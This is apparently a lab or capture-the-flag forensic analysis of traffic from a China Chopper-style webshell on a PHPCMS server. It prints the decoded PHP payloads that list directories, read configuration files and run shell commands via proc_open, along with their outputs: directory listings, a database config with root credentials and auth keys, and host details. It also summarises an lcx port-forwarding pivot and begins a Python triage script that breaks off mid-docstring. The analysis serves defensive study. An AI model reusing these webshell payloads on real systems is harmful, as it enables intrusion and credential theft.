grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64
http ›› ipython                                                                                                                                                                              
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         print line[2:-12].decode("base64")
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the directory /var/www/html/include/crons/

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the directory /var/www/html/include/

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the directory /var/www/html/include/

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the directory /var/www/html/
X@Yphpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the contents of the file /var/www/html/api.php
<?php                  
/**                       
 *  index.php API ....    
 *                        
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-7-26
 */                       
define('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
include PHPCMS_PATH.'phpcms/base.php';
$param = pc_base::load_sys_class('param');
$_userid = param::get_cookie('_userid');
if($_userid) {            
    $member_db = pc_base::load_model('member_model');
    $_userid = intval($_userid);
    $memberinfo = $member_db->get_one(array('userid'=>$_userid),'islock');
    if($memberinfo['islock']) exit('<h1>Bad Request!</h1>');
}                         
$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');
if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback']))  unset($_GET['callback']);
if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {
    include PHPCMS_PATH.'api/'.$op.'.php';
} else {                  
    exit('API handler does not exist');
}                         
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/phpcms/
model/   2017-09-03 03:31:17 4096    0777
libs/   2017-09-03 03:31:16 4096    0777
languages/  2017-09-03 03:31:15 4096    0777
./  2017-09-03 03:31:27 4096    0777
plugin/ 2017-09-03 03:31:27 4096    0777
templates/  2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:38:34 4096    0777
modules/    2017-09-03 03:31:27 4096    0777
base.php    2017-09-03 03:31:15 8462    0777
index.html  2017-09-03 03:31:15 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Reads the contents of the file /var/www/html/phpcms/base.php
<?php
/**
 *  base.php PHPCMS............
 *
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-6-7
 */
define('IN_PHPCMS', true);                                                                     
//PHPCMS........
define('PC_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
if(!defined('PHPCMS_PATH')) define('PHPCMS_PATH', PC_PATH.'..'.DIRECTORY_SEPARATOR);
...

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/caches/
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/caches/configs/
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/system.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Reads the contents of the file /var/www/html/caches/configs/system.php
X@Y<?php                 
return array(            
//........               
'web_path' => '/',                                                                                                     
//Session....     
'session_storage' => 'mysql',
'session_ttl' => 1800,   
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,        
//Cookie....             
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
//............           
'tpl_root' => 'templates/', //................
'tpl_name' => 'default', //................
'tpl_css' => 'default', //............
'tpl_referesh' => 1,     
'tpl_edit'=> 0,//....................
//............           
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/', //........
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',//................
'charset' => 'gbk', //..........
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0, //................
'admin_log' =>           
17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149
E....;@...Q|...u..       
n..".-.<X.#o,P...Y... 1, //....................
'errorlog' => 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL', //....
'lang' => 'zh-cn',  //..........
'lock_ex' => '1',  //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1',    //........phpsso
'phpsso_appid' => '1',  //....id    
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server',   //........
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',//................
'safe_card'=>'1',//..............
'connect_enable' => '1',    //..................
'sina_akey' => '',  //sina AKEY
'sina_skey' => '',  //sina SKEY
'snda_akey' => '',  //.......... akey
'snda_skey' => '',  //.......... skey
'qq_akey' => '',    //qq skey
'qq_skey' => '',    //qq skey
'qq_appkey' => '',  //QQ........ appkey
'qq_appid' => '',   //QQ........ appid
'qq_callback' => '',    //QQ........ callback
'admin_url' => '',  //..................
);                        
?>


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Runs the command whoami
www-data

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Runs the command uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Runs ipconfig (a Windows command that does not exist on Linux); the output shown comes from the trailing pwd in the wrapper
/var/www/html/uploadfile/2017/0905

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Runs the command ifconfig
ens33     Link encap:Ethernet  HWaddr 00:0c:29:da:d6:4e  
          inet addr:192.168.20.88  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:162871217 (162.8 MB)  TX bytes:5569466 (5.5 MB)
                         
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:20038 (20.0 KB)  TX bytes:20038 (20.0 KB)
              

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/include/
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/
./   2017-09-03 03:30:49 4096    0755
html/   2017-09-03 03:38:34 4096    0777
../ 2017-09-03 00:57:48 4096    0755

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/
phpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/phpcms/
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/phpcms/libs/
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/phpcms/libs/data/
./   2017-09-03 03:31:16 4096    0777
font/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:16 4096    0777
ipdata/ 2017-09-03 03:31:16 4096    0777 
dict/   2017-09-03 03:31:16 4096    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/include/
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/caches/
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/caches/configs/
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Reads the contents of the file /var/www/html/caches/configs/database.php

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Reads the contents of the file /var/www/html/caches/configs/database.php (second attempt, via readfile)
<?php                 
return array (           
    'default' => array ( 
        'hostname' => 'localhost',
        'port' => 3306,  
        'database' => 'phpcmsv9',
        'username' => 'root',
        'password' => '123456',
        'tablepre' => 'v9_',
        'charset' => 'gbk',
        'type' => 'mysqli',
        'debug' => true,
        'pconnect' => 0,
        'autoconnect' => 0
        ),
);                                           
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/include/

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// Lists every entry in the directory /var/www/html/

The attacker's approach and the overall attack flow are now clear as well:
First, the attacker (172.16.10.110) obtained a webshell on a reachable Windows host, 192.168.20.117 (DedeCMS).
Then, using lcx, port 80 (phpcms) of the internal host 192.168.20.88 was forwarded to port 8888 on 172.16.10.110.
Finally, the attacker exploited the vulnerability through that forwarded port to gain control of the internal host.
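To reproduce the annotations above automatically, as an added example (not code from the original write-up): a small Python classifier for the captured POST bodies, keyed on the markers every payload on this page shares (the `@ini_set("display_errors","0")` prefix, the `X@Y` output delimiters, and the `fopen`/`opendir`/`cd ...;echo [S];pwd;echo [E]` primitives). The sample bodies are constructed, shortened copies of the shapes seen in the capture, and the function names `classify`/`triage` are this example's own.

```python
"""Triage of captured China Chopper-style webshell commands (added example).

Given the decoded POST bodies that tcpdump -A printed, reproduce the hand-written
annotations ("read file X", "list directory Y", "run command Z") and flag reads of
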